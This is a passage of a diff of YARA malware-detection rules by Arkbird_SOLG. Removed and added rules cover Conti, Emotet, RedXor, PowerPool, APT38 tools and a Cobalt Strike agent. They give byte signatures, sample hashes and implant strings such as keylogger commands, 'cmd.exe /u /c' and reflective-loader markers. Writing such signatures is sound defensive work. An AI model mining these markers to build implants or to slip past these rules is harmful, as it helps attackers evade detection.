-		$jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc }
-		$seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 }
-		$seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 }
-		$seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 }
-		$seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 }
+		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s2 = "\\VarFileInfo\\Translation" fullword wide
+		$s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
+		$s4 = "\\SetupUi" fullword wide
+		$s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 }
+		$s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 }
+		$s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
+		$s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 }
+		$s9 = "ExtKeyloggerStart" fullword ascii
+		$s10 = "ExtKeyloggerStop" fullword ascii
+		$s11 = "ExtServiceDelete" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 1000KB and 6 of ( $com* ) and all of ( $jmp* ) and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_MAL_NK_Rivts_Feb_2009_1 : FILE
+rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Rivts malware used by NK APT"
+		description = "Detect PowerPool malware"
 		author = "Arkbird_SOLG"
-		id = "71dacbd4-36bb-5a45-a288-31bfaef784dc"
-		date = "2020-06-17"
-		modified = "2020-06-18"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1272674621381361672"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-07/NK_Rivts_Feb_2009_1.yar#L3-L22"
+		id = "8248300e-fc3e-56df-be4a-f1850e2bedc8"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "aab3e8067933cbaef2725b5db9e744df2e2be0a89aaf7ce85df79c5f45d72d8f"
+		logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca"
 		score = 75
-		quality = 67
+		quality = 73
 		tags = "FILE"
-		hash1 = "244885b47ec2157a8ea9278bec3ea1883f45d97b1fcb78d4fa875bef0f329a97"
+		hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5"
+		hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644"
+		hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0"
+		hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = "F:\\meWork\\ksj\\Test\\testVir-ga\\testvir_non\\Debug\\testvir_non.pdb" fullword ascii
-		$s2 = "\\\\.\\pipe\\TESTVIR1PIPE" fullword ascii
-		$s3 = "\\system32\\Hana80.exe" fullword ascii
-		$s4 = "\\system32\\nnr60.exe" fullword ascii
-		$s5 = { 54 45 53 54 56 49 52 31 5f 45 56 45 4e 54 5f 4f 42 4a }
-		$s6 = "INFECT" fullword ascii
-		$s7 = { 54 45 53 54 5f 5f 5f 41 43 43 45 53 53 5f 44 49 52 }
-		$s8 = { 2e 70 69 66 }
-		$s9 = { 2f 2f 2f 2f 44 41 45 4d 4f 4e }
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "Set Option failed errcode: %ld" fullword ascii
+		$s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 }
+		$s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 }
+		$s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a }
+		$s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a }
+		$s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a }
+		$s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect RedXor backdoor (Feb 2021)"
+		description = "Detect Emotet loader"
 		author = "Arkbird_SOLG"
-		id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a"
-		date = "2021-03-14"
-		modified = "2021-05-24"
-		reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20"
+		id = "ad67c735-7ed9-5440-b693-55dce9840f56"
+		date = "2021-11-15"
+		modified = "2021-11-16"
+		reference = "https://cyber.wtf/2021/11/15/guess-whos-back/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d"
+		logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919"
-		hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559"
-		tlp = "White"
-		adversary = "Winnti"
+		hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e"
+		hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0"
+		tlp = "white"
+		adversary = "TrickBot Gang"
 
 	strings:
-		$seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
-		$seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
-		$seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
-		$seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 }
-		$seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b }
-		$seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 }
+		$s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff }
+		$s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 }
+		$s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 }
+		$s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf }
+		$s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 25KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 4 of them
 }
-rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect Cobalt Strike agent used by Chimera"
+		description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38"
 		author = "Arkbird_SOLG"
-		id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2"
-		date = "2020-10-03"
-		modified = "2020-10-04"
+		id = "74a20725-3e52-5fef-9934-c812137dc989"
+		date = "2021-03-23"
+		modified = "2021-03-24"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f"
-		score = 75
-		quality = 75
+		logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a"
+		score = 50
+		quality = 67
 		tags = "FILE"
-		hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab"
+		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
+		level = "experimental"
 
 	strings:
-		$header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 }
-		$s1 = "\\\\%s\\pipe\\%s" fullword ascii
-		$s2 = "%04x-%04x:%s" fullword wide
-		$core1 = "core_pivot_session_new" fullword ascii
-		$core2 = "core_pivot_session_died" fullword ascii
-		$core3 = "core_pivot_remove" fullword ascii
-		$core4 = "core_pivot_add" fullword ascii
-		$lib1 = "CreateNamedPipeA" fullword ascii
-		$lib2 = "ConnectNamedPipe" fullword ascii
-		$lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii
-		$export = "ReflectiveLoader" fullword ascii
+		$dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 }
+		$dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 }
+		$dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 }
+		$dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d }
+		$dbg5 = { 25 73 25 73 2e 64 6c 6c }
+		$dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 }
+		$dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 }
+		$s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff }
+		$s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x4a5d and filesize > 30KB and $header and 1 of ( $s* ) and 2 of ( $core* ) and 2 of ( $lib* ) and $export
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $dbg* ) and 1 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Conti_Loader_V3_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect Conti V3 loader"
+		description = "Detect VSingle used in attacks against Japanese organisations by APT38"
 		author = "Arkbird_SOLG"
-		id = "9541b9f8-befe-5bf4-88ee-b1cc5e92f927"
-		date = "2020-12-15"
-		modified = "2020-12-15"
+		id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1"
+		date = "2021-03-23"
+		modified = "2021-03-24"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "c3c8530e1963c5af8ee93a5d2cc222abbeb3fb7e82ef6de2068795a38dca67aa"
+		logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c"
 		score = 50
-		quality = 71
+		quality = 69
 		tags = "FILE"
+		hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e"
 		level = "experimental"
-		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
-		hash2 = "26b2401211769d2fa1415228b4b1305eeeed249a996d149ad83b6fc9c4f703ce"
 
 	strings:
-		$seq1 = { 83 ec 1c 68 80 00 00 00 68 54 21 40 00 ff 15 30 20 40 00 85 c0 0f 85 e9 00 00 00 56 57 68 48 21 40 00 89 44 24 14 89 44 24 10 c7 44 24 1c 17 00 00 00 c7 44 24 20 55 1e 00 00 c7 44 24 24 09 04 00 00 ff 15 34 20 40 00 8b 3d 3c 20 40 00 8b f0 68 34 21 40 00 56 ff d7 68 20 21 40 00 56 a3 e4 33 40 00 ff d7 a3 0c 36 40 00 8d 44 24 14 50 6a 03 8d 4c 24 20 51 68 00 00 40 00 ff 15 e4 33 40 00 85 c0 7c 1a 8b 4c 24 14 8d 54 24 0c 52 8d 44 24 14 50 51 68 00 00 40 00 ff 15 0c 36 40 00 68 18 21 40 00 ff 15 70 20 40 00 8b 54 24 10 83 c4 04 50 68 00 10 00 00 52 6a 00 ff 15 38 20 40 00 8b 4c 24 10 8b f0 8b 44 24 0c 50 51 56 e8 4a 00 00 00 8d 54 24 14 52 }
-		$seq2 = { 8b 4c 24 24 8d 44 24 20 50 51 56 e8 1d fe ff ff 83 c4 24 ff d6 8b 54 24 28 5f 89 15 08 36 40 00 5e 33 c0 83 c4 }
-		$s1 = { 3e 35 44 35 4c 35 53 35 58 35 5e 35 64 35 6c 35 72 35 79 35 }
-		$s2 = { 31 07 32 0d 32 25 32 2b 32 30 32 36 32 4c 32 6a 32 }
-		$s3 = "_invoke_watson" fullword ascii
-		$s4 = { 8b 2d bc 36 40 00 0f b6 04 2f 0f b6 da 8b 54 24 14 0f b6 14 13 8d 0c 2f 03 d6 03 c2 99 be 40 03 00 00 f7 fe 0f b6 f2 8d 04 2e e8 7f ff ff ff 8d 43 01 99 f7 7c 24 18 47 81 ff 40 }
+		$dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 }
+		$dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 }
+		$dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a }
+		$dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 }
+		$dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 73 }
+		$dbg6 = { 25 73 5f 6d 61 69 6e }
+		$dbg7 = { 25 73 5f 66 69 6e }
+		$dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii
+		$s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 }
+		$s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and all of ( $seq* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $dbg* ) and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Conti_V3_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE
 {
 	meta:
-		description = "Detect Conti V3 ransomware"
+		description = "Dectect unknown Middle East implants (retrohunt June 2020)"
 		author = "Arkbird_SOLG"
-		id = "89702af3-664a-5c4a-8d2b-f195f5dddb6f"
-		date = "2020-12-15"
-		modified = "2020-12-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L24-L43"
+		id = "e45675e6-29d5-587b-943e-19450772a092"
+		date = "2021-03-05"
+		modified = "2021-03-06"
+		reference = "internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "2c8f2fd9b155bb4fdb1304b4d7f683bc679780d079d8bbe4fb308f94769f1392"
-		score = 50
+		logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "f092b985b75a702c784f0936ce892595b91d025b26f3387a712b76dcc3a4bc81"
-		hash2 = "35ccc2b71567570bcac62e2f268faca50fa95fad6ac69e74f40856eb8f9ab03d"
